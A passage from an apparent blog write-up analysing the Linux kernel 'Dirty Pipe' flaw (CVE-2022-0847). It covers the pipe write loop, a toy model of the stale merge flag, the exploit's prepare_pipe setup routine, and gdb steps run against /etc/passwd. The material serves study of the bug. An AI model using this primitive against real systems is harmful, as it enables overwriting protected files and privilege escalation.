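int can_merge(unsigned flags, unsigned offset, unsigned len, size_t chars)
{
    return (flags & DEMO_FLAG_CAN_MERGE) != 0 &&
           (size_t)offset + len + chars <= DEMO_PAGE_SIZE;
}
```

Note how last_slot(0, 16) wraps around to slot 15: head is an ever-increasing counter, and the mask maps it back into the ring. In the exploit scenario, the buffer holds one spliced byte and has the stale flag set, so can_merge() is true for any small write that still fits in the page.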

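The next part is not the full for loop, only a part of it, because the rest of the loop deals with __pipe_unlock and with waiting when the pipe is full, which is not important to us.
Note the else branch in the middle: this is where PIPE_BUF_FLAG_CAN_MERGE gets set on every buffer that the write loop creates.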

for (;;) {
        if (!pipe->readers) {
            send_sig(SIGPIPE, current, 0);
            if (!ret)
                ret = -EPIPE;
            break;
        }
        head = pipe->head;
        if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
            unsigned int mask = pipe->ring_size - 1;
            struct pipe_buffer *buf = &pipe->bufs[head & mask];
            struct page *page = pipe->tmp_page;
            int copied;
            if (!page) {
                page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
                if (unlikely(!page)) {
                    ret = ret ? : -ENOMEM;
                    break;
                }
                pipe->tmp_page = page;
            }
            /* Allocate a slot in the ring in advance and attach an
             * empty buffer.  If we fault or otherwise fail to use
             * it, either the reader will consume it or it'll still
             * be there for the next write.
             */
            spin_lock_irq(&pipe->rd_wait.lock);
            head = pipe->head;
            if (pipe_full(head, pipe->tail, pipe->max_usage)) {
                spin_unlock_irq(&pipe->rd_wait.lock);
                continue;
            }
            pipe->head = head + 1;
            spin_unlock_irq(&pipe->rd_wait.lock);
            /* Insert it into the buffer array */
            buf = &pipe->bufs[head & mask];
            buf->page = page;
            buf->ops = &anon_pipe_buf_ops;
            buf->offset = 0;
            buf->len = 0;
            if (is_packetized(filp))
                buf->flags = PIPE_BUF_FLAG_PACKET;
            else
                buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
            pipe->tmp_page = NULL;
            copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
            if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
                if (!ret)
                    ret = -EFAULT;
                break;
            }
            ret += copied;
            buf->offset = 0;
            buf->len = copied;
            if (!iov_iter_count(from))
                break;
        }
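To connect the write loop with the fill-then-drain trick, here is a toy user-space model of the ring. It is a deliberately simplified sketch under my own assumptions: struct demo_buf stands in for struct pipe_buffer, the ring has four slots, and demo_splice only imitates what the splice path does to a slot. With init_flags set to 0 the model leaves the flags field untouched, as described in the public CVE text; with init_flags set to 1 it zeroes the field first.

```c
#include <assert.h>
#include <string.h>

#define DEMO_RING_SIZE      4u      /* toy ring, power of two */
#define DEMO_FLAG_CAN_MERGE 0x10u

struct demo_buf {           /* simplified stand-in for struct pipe_buffer */
    const char *page;       /* which "page" the slot points at */
    unsigned offset, len;
    unsigned flags;
};

struct demo_pipe {
    struct demo_buf bufs[DEMO_RING_SIZE];
    unsigned head, tail;
};

/* Like the write loop above: claim a slot and mark it mergeable. */
static void demo_write(struct demo_pipe *p)
{
    struct demo_buf *b = &p->bufs[p->head++ & (DEMO_RING_SIZE - 1)];
    b->page = "anonymous page";
    b->offset = 0;
    b->len = 1;
    b->flags = DEMO_FLAG_CAN_MERGE;
}

/* Like a read that consumes a slot: the tail moves, the flags stay. */
static void demo_read(struct demo_pipe *p)
{
    p->tail++;
}

/* Like the splice path: point a slot at a page-cache page. With
 * init_flags == 0 the flags field is left untouched (the bug). */
static struct demo_buf *demo_splice(struct demo_pipe *p, int init_flags)
{
    struct demo_buf *b = &p->bufs[p->head++ & (DEMO_RING_SIZE - 1)];
    b->page = "page cache page";
    b->offset = 0;
    b->len = 1;
    if (init_flags)
        b->flags = 0;
    return b;
}

/* Returns 1 if the spliced slot still looks mergeable. */
int spliced_slot_is_mergeable(int init_flags)
{
    struct demo_pipe p;
    memset(&p, 0, sizeof(p));
    for (unsigned i = 0; i < DEMO_RING_SIZE; i++)
        demo_write(&p);             /* fill: every slot gets the flag */
    for (unsigned i = 0; i < DEMO_RING_SIZE; i++)
        demo_read(&p);              /* drain: flags are not cleared */
    assert(p.head == p.tail);       /* the toy pipe is empty again */
    struct demo_buf *b = demo_splice(&p, init_flags);
    return (b->flags & DEMO_FLAG_CAN_MERGE) != 0;
}
```

This is why the fill and drain steps make sense: filling stamps the flag on every slot, draining recycles the slots without resetting it, and whichever slot the splice lands in still claims to be mergeable while pointing at a page-cache page.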

Debugging

I won’t go in-depth with the debugging; I believe the explanation above is more than enough.

But I will show you how I did some debugging, and I will attach the debugging log files.

NOTE: You can use whatever debugger you want, tool, plugin to gdb …etc. I’m just too lazy to install anything :-)

PipeTest Debug

In this one, I just wanted to see how the prepare_pipe function behaves on its own.

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif
/**
 * Create a pipe where all "bufs" on the pipe_inode_info ring have the
 * PIPE_BUF_FLAG_CAN_MERGE flag set.
 */
static void prepare_pipe(int p[2])
{
    if (pipe(p)) abort();
    const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
    static char buffer[4096];
    /* fill the pipe completely; each pipe_buffer will now have
       the PIPE_BUF_FLAG_CAN_MERGE flag */
    for (unsigned r = pipe_size; r > 0;) {
        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
        write(p[1], buffer, n);
        r -= n;
    }
    /* drain the pipe, freeing all pipe_buffer instances (but
       leaving the flags initialized) */
    for (unsigned r = pipe_size; r > 0;) {
        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
        read(p[0], buffer, n);
        r -= n;
    }
    /* the pipe is now empty, and if somebody adds a new
       pipe_buffer without initializing its "flags", the buffer
       will be mergeable */
}
int main(int argc, char **argv)
{
    
    /*if (argc != 4) {
            fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
            return EXIT_FAILURE;
    }*/
    /* dumb command-line argument parser */
    const char *const path = argv[1];
    loff_t offset = strtoul(argv[2], NULL, 0);
    const char *const data = argv[3];
    const size_t data_size = strlen(data);
    int p[2];
    prepare_pipe(p);
}

Compile
gcc -g pipetest.c
Start gdb
gdb a.out
set disassembly-flavor intel

rbreak pipetest.c:.

lay asm and lay n

Some config

set pagination off
set print pretty
set logging file ./pipetest.log
set logging enabled on
Copying output to ./pipetest.log.
Copying debug output to ./pipetest.log.

Run r /etc/passwd 1 test:

From this point, you can have fun.

Github Link: Uploading …

Full exploit code Debug

The configuration and the setup for this part are exactly the same.

Only the results, that is, the debugging log file, will be different.

set pagination off
set print pretty
set logging file ./cve-2022-0847.log
set logging enabled on
Copying output to ./cve-2022-0847.log.
Copying debug output to ./cve-2022-0847.log.

Github Link: Uploading …

The files will be uploaded to github soon, follow the updates on vsociety discord: https://discord.gg/sHJtMteYHQ

Final Thoughts

This is not perfect, but I tried hard to make it as good as I can.

This was a very pleasing journey. However, I think at some point I started to get to points in the kernel that are not exactly related to the vulnerability. That happened because of trying to dive as much as I can into the details so I can have a solid understanding.

Next time I would love to use hooks and dive into the debugging instead of relying so much on code review, and I will also add some fuzzing 😃.